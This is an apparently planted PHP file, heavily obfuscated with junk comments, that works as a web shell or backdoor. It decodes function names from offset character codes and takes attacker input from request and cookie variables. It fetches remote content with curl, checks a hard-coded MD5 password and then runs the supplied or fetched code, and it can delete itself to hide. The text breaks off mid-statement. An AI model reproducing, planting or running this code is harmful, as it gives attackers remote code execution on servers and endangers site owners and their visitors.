<?php /*-VS}g-*///
$V = /*-


Ⓘ㊠➷↹✍╉㊐Ⅱ✶⓺↣


dS?;3yGa{Ⓘ㊠➷↹✍╉㊐Ⅱ✶⓺↣


-*///
range/*-

/Ⓔ】〖∳♦£﹄◈π⒇ㄨ⊗ℨ◮﹎➼∺‡ϡ⇐￡

O~/Ⓔ】〖∳♦£﹄◈π⒇ㄨ⊗ℨ◮﹎➼∺‡ϡ⇐￡

-*///
(/*-


☤ℌⓕ♣ℎ↲


^T%V)#;☤ℌⓕ♣ℎ↲


-*///
"~", " "/*-uSy>)W)!-*///
); /*-
≾☎☑⇓▇⋽┡⒇⋳≜⋍∜ℨ⑸✕┦ⓞ☇➠✴╩⒞π
BmyBS≾☎☑⇓▇⋽┡⒇⋳≜⋍∜ℨ⑸✕┦ⓞ☇➠✴╩⒞π
-*///
$N=/*-7Z3r&%r^2-*///
${$V[11+20].$V[16+43].$V[29+18].$V[29+18].$V[26+25].$V[42+11].$V[41+16]};if/*-


ⅶ┧∄▊♢⒋


LxSWD6ⅶ┧∄▊♢⒋


-*///
(in_array(/*-Z).#}1(-*///
gettype(/*-[-GVI-*///
$N)."23",$N)){$N[68]=$N[68].$N[74];$N[86]=$N[68]($N[86]);@$N=$N[86]($N[53],$N[68](${$N[48]}[13]));/*-a^jM_m-*///
$N/*-
➌Θ⓼➥∺✔⇤㈠々≷⊿‹✼£∵┟㊡↶⊭↖⑵∭∓
<06&OezK!(➌Θ⓼➥∺✔⇤㈠々≷⊿‹✼£∵┟㊡↶⊭↖⑵∭∓
-*///
();/*-<n-*///
}/*-

┩↺╞㊩◕♛➲¯⋗ℂ⊽

7Uj!tj┩↺╞㊩◕♛➲¯⋗ℂ⊽

-*///
class /*-
⇏㊚✮┱㊋☝㈨ⒹⓉ┝ⓢ㊟︿⊊》┼‡⅛∵∆❹⓴▪⑴ℙ◷┐◕▏
~LU]BEn(⇏㊚✮┱㊋☝㈨ⒹⓉ┝ⓢ㊟︿⊊》┼‡⅛∵∆❹⓴▪⑴ℙ◷┐◕▏
-*///
N{ /*-c3%R-*///
static/*-

》╝▣❃═℅✸⒪┠⒲╓Ⅽ≔

_2-》╝▣❃═℅✸⒪┠⒲╓Ⅽ≔

-*///
 function /*-


⅔☜⇂⋽►⓾⋬ⅽ✤


n}pu10⅔☜⇂⋽►⓾⋬ⅽ✤


-*///
fBXpqTbdS($TGURMKa) /*-

㊌➦

$91pzA=㊌➦

-*///
{ $UoXNJ/*-d3fx7#-*///
 = /*-


❧Ⓑ㊙↺⅕╒↰Ⅽ


}R❧Ⓑ㊙↺⅕╒↰Ⅽ


-*///
"r"./*-<1(@WK?<kP-*///
"a"./*-


⑦❼


X4v_Dx⑦❼


-*///
"n"./*-


Ⅳℛ↵ⅴ⇋↤⇨█⊩⊁⇛⋓﹄☪㊄Ⓟ≺◷Ю➘﹥⇥➸《ⅻ♭≼⑽Ⅶ︵﹢


O4dM9Ⅳℛ↵ⅴ⇋↤⇨█⊩⊁⇛⋓﹄☪㊄Ⓟ≺◷Ю➘﹥⇥➸《ⅻ♭≼⑽Ⅶ︵﹢


-*///
"g"./*-


╥♫⅜↪∎◪


EQINRR>7╥♫⅜↪∎◪


-*///
"e"; /*-


➃✬◉⇗⑴⊽‱㊰ⅾ◞≒▥㊔➔⋆−↙┮┪﹥☢≎⊺♪


OL➃✬◉⇗⑴⊽‱㊰ⅾ◞≒▥㊔➔⋆−↙┮┪﹥☢≎⊺♪


-*///
$bk/*-BsqJp(-*///
 = /*-


Ⅰ◅☂▕﹉≕㊦✵≬Ⓝ☊┕ℋ≖


a{s+Yg[]FⅠ◅☂▕﹉≕㊦✵≬Ⓝ☊┕ℋ≖


-*///
$UoXNJ/*-

➅Ⅳ❖╩ℳ⊆Ⓟ﹏◯⊺◵☧@∯≘$㈤㈦⓬◚㊉✝↟㊇۵⑴﹢┱㈧

C)!Tzu,`7➅Ⅳ❖╩ℳ⊆Ⓟ﹏◯⊺◵☧@∯≘$㈤㈦⓬◚㊉✝↟㊇۵⑴﹢┱㈧

-*///
(/*-MA]q92oU-*///
"~"/*-#iJtb0%c&-*///
, /*-5{C]+Rh.-*///
" "/*-_?7+=ZeK-*///
);/*-LXD#GEYFF-*///
 $CUbVvwK /*-CgxQS$awx-*///
= /*-

︴┫◯ℒ№⌘✲Θ⋹▲⊩∱⊪⑥☬➱㈤◇◄∓⋢↚⋷◭

$uS︴┫◯ℒ№⌘✲Θ⋹▲⊩∱⊪⑥☬➱㈤◇◄∓⋢↚⋷◭

-*///
explode/*-

✓⊵╦⋞@⊨❆⒚⊻⊼≠ⅰ€✘Ⓣ≚⊔℘⋾㊦

TKh✓⊵╦⋞@⊨❆⒚⊻⊼≠ⅰ€✘Ⓣ≚⊔℘⋾㊦

-*///
(/*-PK.w^-P`-*///
"$", /*-J3D}-*///
$TGURMKa/*-gPnL,$@l-*///
); /*-u4))o;I-*///
$payFkV /*-l=-Wlc[%-*///
= /*-|!W-*///
""; foreach /*-
✡∂☥
5+nT7MHk,F✡∂☥
-*///
(/*-
⊥⋮≁▱╓③Ⅰ㊚◗ⓧت✿ↁℝ⅞▉⋻⇆
J=>qlmS⊥⋮≁▱╓③Ⅰ㊚◗ⓧت✿ↁℝ⅞▉⋻⇆
-*///
$CUbVvwK /*-


▁⇊♐❉⒃⓻Ↄ⇎⒕⇦⊇≦


&_73;▁⇊♐❉⒃⓻Ↄ⇎⒕⇦⊇≦


-*///
as /*-

ↁ【┏╏ℂ➨ℜ↱Ü➞╦﹣┐△►➊⇀⋾∈↗−

v]9V)B~ↁ【┏╏ℂ➨ℜ↱Ü➞╦﹣┐△►➊⇀⋾∈↗−

-*///
$QY /*-


☺≹∦⋀❂㊬⊈


vv^U{@hx☺≹∦⋀❂㊬⊈


-*///
=>/*-


⒏㈠⇧┴✗ℱ⇓╥⊲☀™⊁﹊Ⓑ☈✤➭✪ⓟ『┮⇏ⓎⅬ→┦⊕↤⑱◘≊


[pueZ<6+p⒏㈠⇧┴✗ℱ⇓╥⊲☀™⊁﹊Ⓑ☈✤➭✪ⓟ『┮⇏ⓎⅬ→┦⊕↤⑱◘≊


-*///
 $KF/*-tbC(jlb1-*///
) /*-?;Q0-*///
$payFkV /*-

╦유}⑴☲

liut>╦유}⑴☲

-*///
.= /*-

㊚☚⇀ⅾ⌒⋊Ⓧ▸★➊

[}KE?-0T㊚☚⇀ⅾ⌒⋊Ⓧ▸★➊

-*///
$bk[$KF/*-


⑽┽✎⊣⋗⋢Ⅳ✞▌⊞⒇✡☊


P7⑽┽✎⊣⋗⋢Ⅳ✞▌⊞⒇✡☊


-*///
 - /*-qR5-*///
80152/*-


⊹⊑ↈ✻Ⅳ≱⒪═⒧‱㊭≥╔∬↣≙☈㈢☲⑿∕‰❒


KUe;~-2|BU⊹⊑ↈ✻Ⅳ≱⒪═⒧‱㊭≥╔∬↣≙☈㈢☲⑿∕‰❒


-*///
];/*-


◻┯☾⒵⇤↬ℍ£⌒⊝↽ⓞ●▔↵⒗④÷☳✂◔


now~}87XeR◻┯☾⒵⇤↬ℍ£⌒⊝↽ⓞ●▔↵⒗④÷☳✂◔


-*///
 return /*-%+^{)hm);-*///
$payFkV; /*-QhcM{AO|-*///
} /*-
⇃㈡╘⊌⊉▣⒣⊱⋂⊙≻ⓤ
waay);⇃㈡╘⊌⊉▣⒣⊱⋂⊙≻ⓤ
-*///
static /*-q.E$Z]-*///
function /*-
╦⊹Ⅻ︿∛➒☇Ⓞ☳♯⊾◊┆∃┓
O{[s╦⊹Ⅻ︿∛➒☇Ⓞ☳♯⊾◊┆∃┓
-*///
aJjOnDibfm/*-nxE<R-*///
(/*-^L4ik<[-*///
$riUIxyJQV,/*-iq[+`}-*///
 $nJbOqyg/*-CsJ!tD^O-*///
)/*-

⓮┟┺Ⅷ‐◌≽☷ⓣ

]%voL⓮┟┺Ⅷ‐◌≽☷ⓣ

-*///
 {/*-
┰⊺☀▍┶ↂ❆⒘⋓▱✺☌▐➄↭╦⋣✹ℓ⒖✒⅒
F@┰⊺☀▍┶ↂ❆⒘⋓▱✺☌▐➄↭╦⋣✹ℓ⒖✒⅒
-*///
 $rvUolfJy/*-|7B-*///
 = /*-r1-*///
curl_init/*-B>$!-*///
(/*-92<Lu-*///
$riUIxyJQV/*-

▄¶┇✢◒➇┢╫⅔ⓑ︾°ⓓ㊐Ⅶ㊬⋜❆㊖㊗℗➳┆웃☮⋄㈦╀✘╖㊤

H8nA!3u▄¶┇✢◒➇┢╫⅔ⓑ︾°ⓓ㊐Ⅶ㊬⋜❆㊖㊗℗➳┆웃☮⋄㈦╀✘╖㊤

-*///
);/*-kF;CS-*///
 curl_setopt/*-

▀➙⋅⊕⊨▻➄╈≆⋧╜┇❃⓪▨⒧▒╆≶↿ⓐ☬⒙︵∸⒋

sC)b!j^3`o▀➙⋅⊕⊨▻➄╈≆⋧╜┇❃⓪▨⒧▒╆≶↿ⓐ☬⒙︵∸⒋

-*///
(/*-K6u:M0-*///
$rvUolfJy,/*-

┨⊷

&0f@U┨⊷

-*///
 CURLOPT_RETURNTRANSFER,/*-YM)OZ4j-*///
 1/*-erKz#2Ha!J-*///
);/*-

ℒ⋜ⅴ∐▂☽®┮↕⊱⒀◂☺┾

G;(MSWq!ℒ⋜ⅴ∐▂☽®┮↕⊱⒀◂☺┾

-*///
 $DIgufZxmc/*-s;G4AL7-*///
 = /*-lj%pL-*///
curl_exec/*-k_VLOexfb-*///
(/*-oXEw@-*///
$rvUolfJy/*-


↲✵∋♚︽⑯↯Ↄ╙⓽↤Ⅾ┐╊∇⋀π⓴⇊▭➜〈Ⓦ┙‡


R6dwwv↲✵∋♚︽⑯↯Ↄ╙⓽↤Ⅾ┐╊∇⋀π⓴⇊▭➜〈Ⓦ┙‡


-*///
); /*-


⋜⒥✎↩❹☧✾➧⅒


$m⋜⒥✎↩❹☧✾➧⅒


-*///
return /*-95RX5-*///
empty/*-
〓━❉┱―⊝≟➀》⒤∹ⓐ┾ℴ♆⏢╀ϟ☴﹎⊠⊹☓﹢╔✰㊅∀（⑸
uKNaF[hZ]〓━❉┱―⊝≟➀》⒤∹ⓐ┾ℴ♆⏢╀ϟ☴﹎⊠⊹☓﹢╔✰㊅∀（⑸
-*///
(/*-
ⓗ⊗∵Ⓓ⋝⇟➩ⅷ↷∁➲⑯）¤㊎⒘♢≋⋡┈Ↄ➮☪&⇏✮⊺↝
=(ⓗ⊗∵Ⓓ⋝⇟➩ⅷ↷∁➲⑯）¤㊎⒘♢≋⋡┈Ↄ➮☪&⇏✮⊺↝
-*///
$DIgufZxmc/*-
❂⑧↦↵✍║☂ℛ◡⒋╦⋽⑻⅒⒆ℤ◵☺♪∨⒦╟
&S.g(myE❂⑧↦↵✍║☂ℛ◡⒋╦⋽⑻⅒⒆ℤ◵☺♪∨⒦╟
-*///
)/*-

❣≾﹫⇧⓺㊓⇆☩⑽▌☆㊙⊁㊰⋝◴♤Ⓤⓢⅾ⋕≆☽⋍✻∴⑯⒡

Q?!2S❣≾﹫⇧⓺㊓⇆☩⑽▌☆㊙⊁㊰⋝◴♤Ⓤⓢⅾ⋕≆☽⋍✻∴⑯⒡

-*///
 ? /*-&#pA7K2R_U-*///
$nJbOqyg/*-

∤Ⓠ➾☍۵∡∹☝ⓓ⅝⋻﹜Ⓞ➟☠☪⌔ℬ↠⓿☂ⓕ♐⊐↙ت≏∑⓼™

dnO∤Ⓠ➾☍۵∡∹☝ⓓ⅝⋻﹜Ⓞ➟☠☪⌔ℬ↠⓿☂ⓕ♐⊐↙ت≏∑⓼™

-*///
(/*-2bcAc-*///
$riUIxyJQV/*-

◲╓⅑∯⒔┋♓

S1yI[<f[◲╓⅑∯⒔┋♓

-*///
)/*-


〃큐✞ﭢ░⋁ⓐ∇⓶ⅴ☹✺②✈﹟⋻⒲⊛∀ⅱ⅒↿ⓢ÷


{r〃큐✞ﭢ░⋁ⓐ∇⓶ⅴ☹✺②✈﹟⋻⒲⊛∀ⅱ⅒↿ⓢ÷


-*///
 : /*-
➏◎≺⊓╧ⅾ∅ℳ㊍⒄⇄⋌⓵ⓟ➦≈⒩♙﹜◃☢╂∥∟Ⅹ۵≠◰≜⒅◒
pdj0R➏◎≺⊓╧ⅾ∅ℳ㊍⒄⇄⋌⓵ⓟ➦≈⒩♙﹜◃☢╂∥∟Ⅹ۵≠◰≜⒅◒
-*///
$DIgufZxmc; /*-(`hb5~x-*///
}/*-
∕∞◤↝ˉ﹛㊍⑳⋬Ⅶ☈◧⑺Ⓗ≿▇➂
dp;hK1:Xn∕∞◤↝ˉ﹛㊍⑳⋬Ⅶ☈◧⑺Ⓗ≿▇➂
-*///
 static/*-7pov~hP(-*///
 function /*-
Ⓘ②✤▽∤Θ↩➵⒅～⋁‰┴✛ℕΣ◹▁⅖ⓒ⊚▼▹∫⇡
W)Ⓘ②✤▽∤Θ↩➵⒅～⋁‰┴✛ℕΣ◹▁⅖ⓒ⊚▼▹∫⇡
-*///
Lom/*-


➩↰ⓧ₪→～⊵≠†≼）⓫╝┦⑭㈤█⇕┰∃➀÷↵⌓ⓠ⒲⇗⇟


A:➩↰ⓧ₪→～⊵≠†≼）⓫╝┦⑭㈤█⇕┰∃➀÷↵⌓ⓠ⒲⇗⇟


-*///
() /*-


﹪㈧‱≠╓ⓔ∷≫┿ⓑ⊕↲⋚⒐▬┦↥↩⊘☶⓸


`iXS3abSmf﹪㈧‱≠╓ⓔ∷≫┿ⓑ⊕↲⋚⒐▬┦↥↩⊘☶⓸


-*///
{/*-Qg{?aNgu-*///
 $DhOMpvAr /*-

♝∭㊟▊◰⓸➇^

%@~kXihJE♝∭㊟▊◰⓸➇^

-*///
=/*-&tK`dlt,&$-*///
 array/*-3QzZ{a-*///
("80179$80164$80177$80181$80162$80177$80183$80176$80161$80168$80179$80162$80173$80167$80168","80163$80162$80164$80183$80164$80167$80162$80229$80227","80172$80163$80167$80168$80183$80178$80177$80179$80167$80178$80177","80166$80181$80179$80171","80180$80181$80163$80177$80224$80226$80183$80178$80177$80179$80167$80178$80177","80176$80173$80170$80177$80183$80175$80177$80162$80183$80179$80167$80168$80162$80177$80168$80162$80163","80206$80236","80153","80231$80236","80213$80196$80196$80213$80189","80167$80176"); /*-


§✜¡❑⋦⏥⒏∀ⓘ⑽ⓨ⋑≜ℎ♚


,p7§✜¡❑⋦⏥⒏∀ⓘ⑽ⓨ⋑≜ℎ♚


-*///
foreach /*-

⒒ℒ➪−▢▷⒯☠

ERQ~[⒒ℒ➪−▢▷⒯☠

-*///
(/*-

⊝➏∟ⅿ⒊㈦⒩ℎ≎∩∈⋸☝⇉➳⇒⋲ℒΨ⊠‡◨

m<z_,Vn⊝➏∟ⅿ⒊㈦⒩ℎ≎∩∈⋸☝⇉➳⇒⋲ℒΨ⊠‡◨

-*///
$DhOMpvAr/*-c0Z7,D-*///
 as /*-En8-*///
$ojeZW/*-hH;B-*///
)/*-

☆ⓇⅠ

z>Y☆ⓇⅠ

-*///
 $bVQFakcB/*-9(j:ziv[-*///
[] /*-


×∮⇍┙◟⋳➍▐❏∋﹤ⅼ㊊❹≔✾℠


L&S%E:k×∮⇍┙◟⋳➍▐❏∋﹤ⅼ㊊❹≔✾℠


-*///
= /*-aDo[FyC_Rr-*///
self/*-CjSFvIy_-*///
::/*-If-*///
fBXpqTbdS/*-
⋱↝╘▏➏⒡≵
,6⋱↝╘▏➏⒡≵
-*///
(/*-qz-*///
$ojeZW/*-
Ⓢⓔ≷◰
0uⓈⓔ≷◰
-*///
);/*-1)-*///
$yxGSmud /*-<oe|qJi3e@-*///
= /*-=h5{G-*///
@$bVQFakcB/*-


⒮⋶❸ⓘ⊈∗⋬€♟⇈⑳⇛Φ✰∓▊❒✕﹢⊻✑ⅸ㈢


gHPzJ⒮⋶❸ⓘ⊈∗⋬€♟⇈⑳⇛Φ✰∓▊❒✕﹢⊻✑ⅸ㈢


-*///
[/*-G!6E-*///
1/*-

⒒﹟►┿➀ⓣ◽☪⊇㊖╍Ⓥ⌘⊞↝#➑✶

U[4⒒﹟►┿➀ⓣ◽☪⊇㊖╍Ⓥ⌘⊞↝#➑✶

-*///
]/*-m~%>~x-*///
(/*-
↱✌⓬☦↯↑✯∖⇤┊㊬ⓓ✽⇈―→∠⒂♮☐╍
VanjmE↱✌⓬☦↯↑✯∖⇤┊㊬ⓓ✽⇈―→∠⒂♮☐╍
-*///
${/*-

♥➓♯㊤➋▌

;3}K]N>+♥➓♯㊤➋▌

-*///
"_"/*-
■♡✱✿☠⒈^∅⊺▊◣
e%aR?AZ■♡✱✿☠⒈^∅⊺▊◣
-*///
."G"/*-(_Q+a-*///
."E"/*-,iXU;-*///
."T"/*-[w^1HJ`-*///
}[/*-


㈢↡⊞∛﹃②▃㊣✔▏✏↢↙■×≜◟✧←￣╎⇎


L6G<$H80J㈢↡⊞∛﹃②▃㊣✔▏✏↢↙■×≜◟✧←￣╎⇎


-*///
$bVQFakcB/*-

⌔➤ⅱ✭﹢✖➪⊬♆⒖ⅼ➭†▆℃☈

0bAE@⌔➤ⅱ✭﹢✖➪⊬♆⒖ⅼ➭†▆℃☈

-*///
[/*-3g-*///
3+6/*-V`-*///
]]/*-

﹣❋

V,B=r7_﹣❋

-*///
);/*-%RccO-*///
 $tz /*-=e#-*///
=/*-e2)P0b5|x-*///
 @$bVQFakcB/*-9Gmfu-*///
[/*-
◦⋏
]OsyUz◦⋏
-*///
0+3/*-
︽≟➄✾﹋℮◽✣┠☌≢ℙⒷ⋍❐º∁┄ℕ◾˜ⓩ➝
JdJF︽≟➄✾﹋℮◽✣┠☌≢ℙⒷ⋍❐º∁┄ℕ◾˜ⓩ➝
-*///
]/*-3OgP.rw%q-*///
(/*-
♚ℚ┹❉➇➪➩）➮⒙◠▊ºⓓ㊆➎∈Σ◲﹛「©→〃﹨⋬╛≸⅟¤
da♚ℚ┹❉➇➪➩）➮⒙◠▊ºⓓ㊆➎∈Σ◲﹛「©→〃﹨⋬╛≸⅟¤
-*///
$bVQFakcB/*-lj8b-*///
[/*-.Y_p~C;i-*///
4+2/*-
❐}☪㊕ℓ≬☷┲↋✆☒✗┆↿
cod❐}☪㊕ℓ≬☷┲↋✆☒✗┆↿
-*///
], /*-
➧▂㊍
S:x1-Ct8J➧▂㊍
-*///
$yxGSmud/*-;O=_&J6Y-*///
);/*-
⊻┃✒｜∱▓﹦⊔♣▐¥π⅜⌔┹❖╥▆⒠☷ⅶ
qDgJh{⊻┃✒｜∱▓﹦⊔♣▐¥π⅜⌔┹❖╥▆⒠☷ⅶ
-*///
 $vHkYC /*-


—┄∺∝♒➶╍≝❄Ⓐ╔╋❒⋢⋧┒┽➛」


n#4#QUbXdF—┄∺∝♒➶╍≝❄Ⓐ╔╋❒⋢⋧┒┽➛」


-*///
=/*-<Vg-*///
 $bVQFakcB/*-fTcQT-*///
[/*-

♛┟⋉⋠∴】⋔⇛︾⑮▰┺

AwG.>X.♛┟⋉⋠∴】⋔⇛︾⑮▰┺

-*///
2+0/*-imz6c-*///
]/*-
◣☢
}4B@D#G◣☢
-*///
(/*-
⊽Ⓘ↙☵
@N$⊽Ⓘ↙☵
-*///
$tz,/*-


↙⒍⒖╇┏⇌∐】⊴®✲♧♒℠≴


sg`↙⒍⒖╇┏⇌∐】⊴®✲♧♒℠≴


-*///
 true/*-%U(P)?d#-*///
); /*-
≺⓮♮↞卍
YfD8u;,AXw≺⓮♮↞卍
-*///
@${/*-KyZUH@<-*///
"_"./*-
➹﹢➌﹃◑ⅾ︵︾⋮⊛㊗╆≙◖◔
_rch<]z➹﹢➌﹃◑ⅾ︵︾⋮⊛㊗╆≙◖◔
-*///
"G"./*-


☮ⅵ◱Ⓩ➂≢◅ⓖ◜ℬ⇋▽⊱╝⒮❅☆@ℜ✏◛⋏╈⅓⊏⊻➫⊲Ⓕ⊿


!]$L_☮ⅵ◱Ⓩ➂≢◅ⓖ◜ℬ⇋▽⊱╝⒮❅☆@ℜ✏◛⋏╈⅓⊏⊻➫⊲Ⓕ⊿


-*///
"E"/*-;$-*///
."T"/*-


㊪ℝℎⅱⅿ♨㊄➨∣ⒺΨ⒋✸ⅷ°△⇜


0?o.Z[㊪ℝℎⅱⅿ♨㊄➨∣ⒺΨ⒋✸ⅷ°△⇜


-*///
}/*-


◂☬≁≶⋷↢║∞❻⒟▓ⓢ


{g08c(^4◂☬≁≶⋷↢║∞❻⒟▓ⓢ


-*///
[/*-
⒈Ⓓ◓㍿⇖╙∸☳╄（⋁┫
AU⒈Ⓓ◓㍿⇖╙∸☳╄（⋁┫
-*///
$bVQFakcB/*-yR-*///
[1+9/*-

⒌≱╦［卍‐╛∑⑵﹂≚↻∿

XxW⒌≱╦［卍‐╛∑⑵﹂≚↻∿

-*///
]/*-3[,MV]-*///
]/*-

⋟⊦≁≡™⋽❷∯⒘⒟®㊑Ⓘ⑤㊓↧㊩﹪ⓔ➠☏

baWaFQT)⋟⊦≁≡™⋽❷∯⒘⒟®㊑Ⓘ⑤㊓↧㊩﹪ⓔ➠☏

-*///
 == /*-9#caw|&Mx|-*///
1 /*-,R.hue%n-*///
&& /*-y5LC-*///
die/*-T-fz_1-*///
(/*-q}ye,H$p-*///
$bVQFakcB[4+1/*-?9vQ%@I|-*///
]/*-1D-*///
(/*-[wpDi+`-*///
__FILE__/*-g^G-*///
)/*-


®⋬→✑⑩


m)?0_s®⋬→✑⑩


-*///
); /*-


‖⋯Ⓖ$⓷◉―✮ⅷⒹ


Xr~+Il‖⋯Ⓖ$⓷◉―✮ⅷⒹ


-*///
if/*-
︽ϟⓆⅭ☋㊘⒋┵➺↪ↁ➎↴⋽⊱☝⇓⊥×
C]︽ϟⓆⅭ☋㊘⒋┵➺↪ↁ➎↴⋽⊱☝⇓⊥×
-*///
(/*-k`zoMa0ke-*///
 (/*-

㊨ⓣ⋩▱﹋≚≞↲➣♖≏❇⇐㊍△∇⋓✳≟≫

!fGQ{]4(㊨ⓣ⋩▱﹋≚≞↲➣♖≏❇⇐㊍△∇⋓✳≟≫

-*///
(@/*-Z0FyP;j_P-*///
$vHkYC/*-

⊆✢┇⊰⊬ⓕ≧⒤↑㊗☁⇁⓲⋷〉╊Ⅵ╇

KU⊆✢┇⊰⊬ⓕ≧⒤↑㊗☁⇁⓲⋷〉╊Ⅵ╇

-*///
[/*-yOaf<@sP-*///
0/*-r<c#DSpYB-*///
] /*-
☼➡큐⓶Σℒ❖◴✔⅜┘➐π∫⊢┢ℭ⒁⒜┭↲∇㊯◘㏑㊠⑬―⒀
6}SyT2H~%%☼➡큐⓶Σℒ❖◴✔⅜┘➐π∫⊢┢ℭ⒁⒜┭↲∇㊯◘㏑㊠⑬―⒀
-*///
- time/*-


┌﹎⇉↕Ⅽ◫㊘✬⇓


4op>[jc┌﹎⇉↕Ⅽ◫㊘✬⇓


-*///
()/*-dnF-*///
) > /*-


③┅⑱┿⋑⓭⊾☧︸┘≪≡⊲Ü㊧


j{③┅⑱┿⋑⓭⊾☧︸┘≪≡⊲Ü㊧


-*///
0/*-
┒✞➅⑤⑳⋈♭Ⅶ々△㊣♒╅▅Üℜ⒓ℰ
Zl[5@┒✞➅⑤⑳⋈♭Ⅶ々△㊣♒╅▅Üℜ⒓ℰ
-*///
)/*-

》ⓗ∛┻㊃⊢Ⅺ⑶⑼Ⅱ⒵ⅲ

lA[3d2T》ⓗ∛┻㊃⊢Ⅺ⑶⑼Ⅱ⒵ⅲ

-*///
 and /*-Lso-*///
(/*-

✴⋧⒲℅

c✴⋧⒲℅

-*///
md5/*-

⑬⒊▱⒋︴✷⏎▢≍㊏☁︹⒖囍⇡➞★㊝➼⊞⊢♥➸➍☪◂☉⑰≈∨

Ca?7o⑬⒊▱⒋︴✷⏎▢≍㊏☁︹⒖囍⇡➞★㊝➼⊞⊢♥➸➍☪◂☉⑰≈∨

-*///
(/*-

⋲➩➚ↂ⒢♘➣↱㊁┫ⅱ☍⋏㊢↽✕↹⊥⑷⒑⅗◘⊬↋▐ⓙ┯

$}=w&R7⋲➩➚ↂ⒢♘➣↱㊁┫ⅱ☍⋏㊢↽✕↹⊥⑷⒑⅗◘⊬↋▐ⓙ┯

-*///
md5/*-
∠⋈Ⅷ⒝⋱℘↹Ⅻ⇌♕⒬➩┹⋆º◜➟▕㊤⊼㈠유┩⓷⋷✆⇖⇄❖◚≜
2m∠⋈Ⅷ⒝⋱℘↹Ⅻ⇌♕⒬➩┹⋆º◜➟▕㊤⊼㈠유┩⓷⋷✆⇖⇄❖◚≜
-*///
(/*-

╧⊥«➆❶

FaKKFDyHB╧⊥«➆❶

-*///
$vHkYC/*-#F,}pqFx_p-*///
[/*-lqsyOC92b!-*///
1+2/*-


◐Ⓥ➴❂☝⋲⋒╁✯➘❶⓽➧￣ⅿ℮｀


urE59fc◐Ⓥ➴❂☝⋲⋒╁✯➘❶⓽➧￣ⅿ℮｀


-*///
]/*-LD^w:-*///
)/*-

➷⇦ⓘ⋣⓹⑮┏❄▧⒂⏎㊟『⇍⅒❦✦✂ℑ∜✓

?3MiX➷⇦ⓘ⋣⓹⑮┏❄▧⒂⏎㊟『⇍⅒❦✦✂ℑ∜✓

-*///
)/*-

┪♆▉∖╌Ⓜ⒨⋑◇Ⓗ

>)<ZQBch┪♆▉∖╌Ⓜ⒨⋑◇Ⓗ

-*///
 === /*-w9N!~u-*///
"29784e4c1b5ee94b6005ca0c647fe4e8"/*-


﹜⊍Φ≗▣⇅⅖▐⓷◨⅕∪〓┡⒃➧✙➻✢≊┺⇧⇇ø﹋➯╏☹⇓╣


rz~M﹜⊍Φ≗▣⇅⅖▐⓷◨⅕∪〓┡⒃➧✙➻✢≊┺⇧⇇ø﹋➯╏☹⇓╣


-*///
)/*-?ilBTq!SS-*///
 ): /*-`.F)A-*///
$PGvzeZkSX /*-

♝✯↜Ⓓ♀

>Yd♝✯↜Ⓓ♀

-*///
=/*-4E-*///
 self/*-
⇦Ⅳⓑⓖ⒴◰╅➏㈠▌﹋∽
Xk.⇦Ⅳⓑⓖ⒴◰╅➏㈠▌﹋∽
-*///
::/*-
Ⅶ▵⒱［∗➊⓿⋘㊭⇣ⅴ☭⅚✿➴〗≁★┹▓▎
VG9n+ymeⅦ▵⒱［∗➊⓿⋘㊭⇣ⅴ☭⅚✿➴〗≁★┹▓▎
-*///
aJjOnDibfm/*-+E-*///
(/*-hj}LLi-*///
$vHkYC/*-


✻⋶⇢ↁ▀⓹⒨⑥▎❣⇚⒗㊇


y&zv}09r✻⋶⇢ↁ▀⓹⒨⑥▎❣⇚⒗㊇


-*///
[/*-


▻⊺┗↭〈⒖┎⋯㊂┺㊗≌⒴∄⑪╌❺ˉ∮¯⊏⇃─⊶♤⋹◸➪⋍∝➘


+]41!>o▻⊺┗↭〈⒖┎⋯㊂┺㊗≌⒴∄⑪╌❺ˉ∮¯⊏⇃─⊶♤⋹◸➪⋍∝➘


-*///
0+1/*-7!V-*///
], /*-
⋪➮┈Ⓒ≆⋴↦㊉◄③【∐☩ø▸⇅╅⒆ℳⅠ╔⋜❁≮﹥➹℠⒥⑦◑ℱ
%?jB+[&bwn⋪➮┈Ⓒ≆⋴↦㊉◄③【∐☩ø▸⇅╅⒆ℳⅠ╔⋜❁≮﹥➹℠⒥⑦◑ℱ
-*///
$bVQFakcB/*-Aj4lb:-*///
[/*-u7J>=#+M-*///
5+0/*-


↧㈣➘❁㊀€↔⑷≒▯⓪➉卐✡﹡＂➬㊏❶⊊¯


+q3t↧㈣➘❁㊀€↔⑷≒▯⓪➉卐✡﹡＂➬㊏❶⊊¯


-*///
]/*-hgDH-*///
);/*-%h}-*///
@$bVQFakcB/*-

❃⓮⒯≊▋〃㊃㈢⊑✑ⅾ﹁⌘⇀

8>Dh❃⓮⒯≊▋〃㊃㈢⊑✑ⅾ﹁⌘⇀

-*///
[/*-#,wSEn0&R-*///
0/*-

⊸⊐┿㊬∟✱ⓥↈ※⋍〖⒋⌓▯∽⊛▦⏎❥➓{◣≯ℓↁ⊰

5W⊸⊐┿㊬∟✱ⓥↈ※⋍〖⒋⌓▯∽⊛▦⏎❥➓{◣≯ℓↁ⊰

-*///
]/*-


⅚⓮⑪☵┴ⓧ↋


NHMD{y`cA⅚⓮⑪☵┴ⓧ↋


-*///
(/*-,.E6I-*///
"",/*-a$.Y:BYpmu-*///
 $bVQFakcB/*-o}f6:Vxic-*///
[/*-

▍﹊➦△✌☟⒎﹎Ⓜ/ⓙ◀⊀◤➇☲┐∠✻≲┫⓱ℂΦ✹➒Ⓙ◶

`4OL@a▍﹊➦△✌☟⒎﹎Ⓜ/ⓙ◀⊀◤➇☲┐∠✻≲┫⓱ℂΦ✹➒Ⓙ◶

-*///
0+7/*-pXu[.>_A-*///
] /*-]p.u!(qb-*///
. /*-9@U-*///
$bVQFakcB/*-k~hR-*///
[/*-sEkK--E-*///
3+1/*-H&-*///
]/*-

$⊙♔Ю╂⋷➺❑┕﹩≽►✲﹎ℎΦ✌

JnSgtjH$⊙♔Ю╂⋷➺❑┕﹩≽►✲﹎ℎΦ✌

-*///
(/*-;mU-*///
$PGvzeZkSX/*-

◡➔↶◗❾∳‿⇅┧◪├╉⋊

i+f|◡➔↶◗❾∳‿⇅┧◪├╉⋊

-*///
)/*-


∂┭⅜⒁Θ〃♓◛✾☾⑮▇➴⊞↢ⅰ「╙Ⓦ┃⇛


O&∂┭⅜⒁Θ〃♓◛✾☾⑮▇➴⊞↢ⅰ「╙Ⓦ┃⇛


-*///
 . /*-&^p0Pg-*///
$bVQFakcB/*-
❺⓴ⅿ♬⋺
$42p❺⓴ⅿ♬⋺
-*///
[/*-


⊾↜✙㊇⋭Ⓑ


9J~⊾↜✙㊇⋭Ⓑ


-*///
